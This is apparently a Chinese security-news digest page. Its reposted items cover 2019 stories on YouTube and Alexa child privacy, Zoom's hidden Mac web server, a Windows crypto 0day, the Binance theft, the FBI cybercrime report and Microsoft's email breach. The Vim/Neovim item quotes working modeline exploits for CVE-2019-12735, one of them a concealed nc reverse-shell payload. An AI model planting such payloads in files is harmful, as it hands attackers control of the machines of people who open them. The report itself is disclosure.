分类: 今日推送

FTC 结束 YouTube 侵犯儿童隐私调查 谷歌或罚款 100 万美元

美国联邦贸易委员会(FTC)已经加大罚款力度,重拳打击隐私泄漏。据悉FTC最新目标是谷歌的YouTube,相关调查显示这家全球最大视频网站非法跟踪未成年人如何使用该平台的相关数据。援引华盛顿邮报报道,FTC的一项调查结果显示谷歌无法为使用YouTube的儿童提供应有的保护,而且会收集他们的数据。这种行为违反了儿童在线隐私保护法案(COPPA),该法案禁止对13岁及以下儿童进行数据收集和地理位置定位数据。 虽然这个报道得到了两位消息人士的证实,但是谷歌和FTC均拒绝发表评论。而接下来的阶段就是交由美国司法部同意罚款和其他相关条件,不过通常情况下美国司法部不会反对FTC的裁决。 在报道中称谷歌已经和FTC达成和解,预计Google将为此支付数百万美元的罚款,但其与FTC和解的确切金额和条款尚不清楚。这项和解协议达成之际,科技巨头们正面临着来自政府和用户的更多审查,因为人们对他们如何收集和保护用户数据的担忧与日俱增。FTC和司法部最近分割了亚马逊、苹果、Facebook以及谷歌的监管权力,这可能会导致对这些公司权力的更严格审查。 FTC担心的问题之一是,网站、视频游戏和其他服务没有明确将目标对准儿童,但仍然吸引了大量未成年用户。这些公司还抱怨说,法律不够明确。 COPPA禁止公司在大多数情况下收集儿童数据或通过个性化广告瞄准他们,但这项法律只适用于针对儿童的网站或应用程序,或“实际知道”用户不满13岁的网站或应用程序。   (稿源:cnBeta,封面源自网络。)

苹果发布静默更新:移除受 Zoom 安全漏洞影响的Web服务器

援引外媒 TechCrunch 报道,在曝光视频会议应用 Zoom 存在严重的零日漏洞–可以在 Mac 上使用隐藏的 Web 服务器打开视频通话之后,苹果决定亲自介入并已采取相应的措施方案。苹果发布了一个静默更新,意味着无需用户参与的情况下在 Mac 设备上移除这些网页服务器,能够防止所有已经安装 Zoom 软件的 Safari 用户进一步受到感染。     尽管 Zoom 在昨天已经发布了紧急修复补丁来移除这些网页服务器,不过显然苹果担心用户并不会主动更新,或者没有意识到打补丁的重要性,从而忽略了这个补丁更新。苹果的介入无疑提供了更妥善的安全解决方案,不仅是因为很多用户可能在暂时不会打开 Zoom,而且很多用户还卸载了这款应用程序。 不过需要注意的是,如果没有安装 Zoom 的紧急更新就执行卸载程序,这些网页服务器依然会留在用户计算机设备上,因此 Zoom 无法通过更新的应用程序卸载它。这就意味着唯一可靠和简单的方法就是苹果的介入。苹果报告称本次调整并不会影响 Zoom 应用在 Mac 设备上的功能。 Zoom 发言人 Priscilla McCarthy 告诉 TechCrunch:“我们很高兴与Apple合作测试此更新。我们希望今天解决 Web 服务器问题。我们感谢用户的耐心,因为我们会继续努力解决他们的问题。 本周早些时候,安全研究员 Jonathan Leitschuh 公开披露了在 Mac 电脑上 Zoom 视频会议应用中出现的一个严重零日漏洞。他已经证明,任何网站都可以在安装了 Zoom 应用的 Mac 电脑上打开视频通话。 这在一定程度上是可行的,因为 Zoom 应用在 Mac 电脑上安装了一个网络服务器用于接收普通浏览器不会接收的请求。事实上,即便卸载了 Zoom, 网络服务器仍会持续存在,并且可以在不需要用户干预的情况下重新安装 Zoom。   (稿源:cnBeta,封面源自网络。)

Vim 与 Neovim 曝出任意代码执行漏洞

安全研究人员发现 Vim 与 Neovim 中存在一个任意执行漏洞,允许黑客在用户打开恶意文本文件时控制计算机。漏洞影响 Vim 8.1.1365 与 Neovim 0.3.6 之前的所有版本。 该漏洞存在于编辑器的 modeline(模式行)功能,此功能允许用户在文本文件的开头或结尾设置窗口尺寸和其它自定义选项,它在一个被操作系统封锁的沙箱中运行,并且可用命令也被限制,但是研究人员 Arminius 发现了绕过该安全保护的方法。 目前漏洞已经被编号为 CVE-2019-12735,Arminius 也释出了两个概念验证。 第一个是直接利用该漏洞使系统执行`uname -a`命令: :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" 另一个利用方式更加深入,一旦用户打开文件就自动启动反向 shell。为了隐藏攻击,文件将在打开时立即重写。此外,当使用 cat 输出内容时,攻击还使用终端转义序列隐藏 modeline: \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n 目前补丁也已经释出: Vim patch 8.1.1365 Neovim patch (released in v0.3.6) 更具体的细节见: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md.   (稿源:开源中国,封面源自网络。)

因 Alexa 经常收集儿童用户录音 亚马逊遭到起诉

据报道外媒,任何打开 YouTube 的人都能找到无数儿童在与 Alexa 开心交谈的视频。Alexa 是亚马逊推出的一款数字语音助手智能扬声器产品。在这款产品给用户带来便利、乐趣的同时,许多人却在担心由其带来的隐私问题。 日前,这家公司就因这个问题遇到了两起联邦诉讼。诉讼称 Alexa 经常在未经儿童或其父母同意的情况下对数百万名儿童进行录音和收集声纹。 获悉,其中一起诉讼于周二在西雅图联邦法院发起,原告为一名来自马萨诸塞州的 10 岁女孩。就在同一天,洛杉矶法院也接到了一起类似的诉讼,原告则为一名 8 岁的男孩。 诉讼的核心在于加利福尼亚州和华盛顿都被称为“两方同意州”。在这两个州中,如果想要对某人进行录音商家则必须要征得双方的同意才行。然而,西雅图的诉讼称,“亚马逊从未警告未注册用户,它正在为他们的 Alexa 互动创建持续的语音记录,更不用说征得他们的同意了。” 针对这两起诉讼案,亚马逊方面拒绝置评。   (稿源:cnBeta,封面源自网络。)

Facebook 研究 App 收集近 19 万用户数据 已被苹果封杀

新浪科技讯 北京时间 6 月 13 日早间消息,Facebook 从目前已停用的 Research 应用中收集了 18.7 万名用户的个人和敏感设备数据。苹果今年早些时候以违规为由封禁了这款应用。 Facebook 在提供给参议员理查德·布卢门塔尔(Richard Blumenthal)办公室的邮件中表示,该公司收集了 3.1 万名美国用户的数据,其中包括 4300 名年轻人。收集的其它数据来自印度用户。 今年早些时候,美国媒体调查发现,Facebook 和谷歌都在滥用苹果的企业开发者证书,这种证书主要用于开发仅供企业员工使用的 iPhone 和 iPad 应用。调查发现,这些公司违反了苹果的规定,在苹果 App Store 之外提供面向普通用户的应用。这些应用收集参与者使用设备的数据,了解他们的使用习惯,同时向用户支付报酬。 苹果为此先后撤销了 Facebook 和谷歌的企业开发者证书,封禁了这些应用。不过在回答议员的问题时,苹果表示,该公司不清楚有多少设备安装了 Facebook 的违规应用。 苹果联邦事务总监蒂莫西·鲍德利(Timothy Powderly)表示:“我们知道 Facebook Research 应用的配置文件是在 2017 年 4 月 19 日创建的,但这并不一定就是 Facebook 向终端用户分发配置文件的日期。” Facebook 表示,这款应用可以回溯至 2016 年。 美国媒体还获得了苹果和谷歌 3 月初致议员的邮件。邮件显示,这些“研究”应用依赖于自愿参与者从 App Store 之外的下载,需要用到苹果的开发者证书来安装。随后,应用将会安装根网络证书,允许应用从设备中收集所有数据,包括网页浏览历史、加密消息和应用活动,可能还包括来自好友的数据,用于竞争性分析。(维金)   (稿源:新浪科技,封面源自网络。)

Google 研究员披露 Windows 10 0day 漏洞

安全研究员 Tavis Ormandy‏ 是谷歌 “Project Zero” 团队的一员,负责寻找 0day 漏洞。他公开了一个可利用的 Windows 漏洞,目前,微软仍处于修复过程中。 Tavis Ormandy 发推文说他已经发现了 Windows 核心加密库的安全问题,“微软承诺在 90 天内修复它,结果没有”。于是在第 91 天,Ormandy 选择了公开这个漏洞。 该漏洞实际上是 SymCrypt 中的一个错误,SymCrypt 是负责在 Windows 10 中实现非对称加密算法和在 Windows 8 中实现对称加密算法的核心加密库。Ormandy 发现,通过使用格式错误的数字证书,他可以强迫 SymCrypt 计算进入无限循环。这将有效地对 Windows 服务器执行拒绝服务(DoS)攻击,例如,运行使用 VPN 或 Microsoft Exchange Server 进行电子邮件和日历时所需的 IPsec 协议的服务。 Ormandy 还指出,“许多处理不受信任内容的软件(如防病毒软件)会在不受信任的数据上调用这些例程,这将导致它们陷入僵局。” 不过,他还是将其评为低严重性漏洞,同时补充说,该漏洞可以让人相对轻松地拆除整个 Windows 机群,因此值得注意。 Ormandy 发布的公告提供了漏洞的详细信息,以及可能导致拒绝服务的格式错误的证书示例。 如前所述,Project Zero 有 90 天的披露截止日期。Ormandy 于 3 月 13 日首次报告此漏洞,然后在 3 月 26 日,微软确认将发布安全公告,并在 6 月 11 日的 Patch Tuesday 中对此进行修复。Ormandy 认为,“这是 91 天,但在延长期内,所以它是可以接受的。” 6 月 11 日,微软安全响应中心(MSRC)表示“该修补程序今天不会发布,并且由于测试中发现问题,在 7 月发布之前也不会修补好”,于是 Ormandy 公开了这个漏洞。 公开的漏洞地址:https://bugs.chromium.org/p/project-zero/issues/detail?id=1804 消息来源:Forbes   (稿源:开源中国,封面源自网络。)

Binance 遭黑客入侵 损失价值超 4000 万美元的比特币

HackerNews.cc 5 月 8 日消息,全球最大的加密交易货币场所之一Binance,今日确认公司损失了近4100万美元的比特币。这似乎是该公司迄今为止遭受的最大黑客攻击。 Binance的CEO赵长鹏发声明说公司早在5月7号前就已发现大规模的安全漏洞。黑客因此窃取了大约7000个比特币,价值4060万美元。 据该公司称,恶意攻击者使用了各种攻击技术,包括网络钓鱼和计算机病毒,实施了这一入侵,并侵入了一个BTC热钱包(一个连接到互联网的加密货币钱包)。该钱包约占公司比特币持有总量的2%,并在一次交易中提取了被盗的比特币。更令人不安的是,该公司承认,黑客设法获取了用户的关键信息,如API密钥、双因素身份验证码,以及其他潜在的信息。这些信息是登录Binance帐户所必需的。但幸运的是,用来储存大部分资金的线下钱包即Binance的冷库仍然是安全的。此外,联网的个人用户钱包没有受到直接影响。 Binance已经将其平台上的所有存款和取款业务暂停了大约一周,同时全面审查了安全性并调查了这起事件。CEO表示,该公司去年建立了一个名为“用户安全资产基金(SAFU)”的内部保险机制,该机制将覆盖黑客攻击的全部金额,不会影响用户。   消息来源:Thehackernews, 译者:Vill,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

FTC 就 Facebook 隐私泄露惩罚问题未能达成一致意见

据外媒报道,来自《纽约时报》的一篇新报道称,FTC难以就针对Facebook隐私泄露的惩罚问题达成一致,该委员会成员还特别在意是否让这家公司的CE马克·扎克伯格承担个人责任。 据报道,Facebook因严重侵犯公众隐私而面临FTC的巨额罚款,这家社交网络公司表示将拨出30亿美元用于支付这笔罚款,另外它还可能会被要求在公司内部设立专注隐私工作的新职位。鉴于Facebook上季度的营收有151亿美元,30亿美元对其来说只是小菜一碟。 《纽约时报》的报道指出,FTC主席Joseph Simons已让委员会的三名共和党成员准备批准一项协议,然而其余两名民主党成员则坚持采取更加严厉的惩罚。不过据报道,Simons试图避开党派路线的决定,而这可能会引发政治后果或潜在诉讼。此外,被视为软弱回应的做法还可能会削弱公众对FTC的监管信心,特别是在欧洲实施了更为严格的监管规定之后。   (稿源:cnBeta,封面源自网络。)

FBI 发布 2018 年《互联网犯罪报告》 经济损失增幅巨大

据外媒SlashGear报道,美国联邦调查局(FBI)的互联网犯罪投诉中心(IC3)发布了2018年《互联网犯罪报告》。该文件显示了向FBI报告的犯罪统计数据,以及互联网上犯下的罪行总数。 2018年,这一年的经济损失估计几乎是2017年的两倍,这是追踪这些统计数据开始以来的最大增幅。 根据IC3,2018年因网络犯罪造成的总经济损失约为27亿美元。2017年的总额约为14.2亿美元,而2016年的总额约为14.5亿美元。2015年的损失有史以来首次突破10亿美元大关,而2014年的损失约为8亿美元。 IC3在过去五年的报告中收到的投诉数量似乎相当缓慢 – 但肯定不会下降。虽然损失迅速增加,但报告从2014年的26.9万起增加到2015年的28.8万起。2016年,IC3的投诉约为29.9万起,2017年高达30.2万起,2018年为35.2万起。 许多现代骗局仍然使用电子邮件 “薪资转移”骗局是一个很好的例子,表明受害者很少或根本不知道他们是犯罪的受害者,直到为时已晚。IC3在2018年仅接到100个关于这个特定骗局的电话,但损失估计达到1亿美元。 Payroll Diversion从钓鱼邮件开始,从不知情或容易被欺骗的员工那里获取员工登录信息。诈骗者使用所述登录信息将工资单从一个直接存款位置重定向到另一个直接存款位置,将收入发送到单独的帐户。这种骗局显然最适合教育、医疗保健和商业航空运输业的员工。 如果IC3的估计是正确的,那么2018年的Business Email Compromise损失将超过12亿美元。 年龄排名 无论您的年龄多大,您都可能成为网络犯罪的受害者。根据这份报告,年龄越大的人更有可能成为网络犯罪的受害者。 排名靠前的州   在美国境内,加利福尼亚州是2018年受害人数最多的州。紧随其后的是德克萨斯州和佛罗里达州,其次是纽约州、宾夕法尼亚州、弗吉尼亚州、伊利诺斯州。2018年,科罗拉多州和佐治亚州的受害者人数在4000-9999之间,其他所有州的人数都减少了。 经济损失最多的州依次是加利福尼亚州、德克萨斯州、佛罗里达州、纽约州、北卡罗来纳州、俄亥俄州、伊利诺伊州、密歇根州、新泽西州和马萨诸塞州。该名单上的前5个州中的每一个在2018年的经济损失都超过1亿美元。 请注意北卡罗来纳州的受害者人数并未排在前十位,但是经济损失的金额相当高。 您将在下面看到2018年《互联网犯罪》报告的一系列其他统计数据。这些部分显示了不同的犯罪类型和损失数额等。注意虚拟货币出现多次。       (稿源:cnBeta,封面源自网络。)  

微软疑淡化邮件服务被黑事件 知情者:实际情况更严重

据美国科技媒体Motherboard报道,微软证实,公司邮件服务的一些用户可能会成为黑客攻击目标。根据微软的声明,黑客曾入侵微软一个客户支持帐户,然后获取与客户邮件帐户有关的信息,比如邮件主题和沟通对象信息等。但Motherboard认为,实际情况似乎比声明所说更严重。 一位知情人士曾亲眼见过攻击,并在微软发表声明前描述此事,他还向Motherboard提供截图。按照这位知情人士的说法,黑客可以从大量Outlook、MSN、Hotmail邮件帐户获取邮件内容。随后微软向Motherboard确认,说黑客的确可以获取客户的邮件内容。 3月份,在微软公开确认攻击之前,消息人士曾经告诉Motherboard,黑客就可以通过一个客户支持门户进入任意邮件帐户,但企业级帐户除外。也就是说,企业付费之后获得的企业帐户不会受到影响,只有普通消费者帐户受到威胁。消息人士还介绍了攻击是怎样进行的,比如如何利用微软客户支持工具。周日时,消息人士再次谈到细节,提供进一步信息和截图,告诉Motherboard黑客可以获取哪些信息。 按微软原来的说法,黑客无法获取邮件内容或者附件。消息人士却认为,黑客可以完全获取邮件内容。周日时,消息人士再次提供一张截图,里面有“邮件正文”标签,还有消息人士编辑过的邮件正文。消息人士说,黑客使用的微软支持帐户属于高权限用户,它能接触的内容比其它员工多。 将截图交给微软,微软证实说它已经向部分用户发送通知,告诉他们邮件内容也受到影响。微软还说,只有一小部分用户受到影响,当中约有6%的用户其邮件内容存在泄露风险,不过微软没有透露具体总数字。 微软在声明中表示:“通过禁用存在风险的凭证,阻止作恶者入侵,我们已经解决问题,只有消费级帐户的极少一部分受到影响。”   (稿源:新浪科技,封面源自网络。)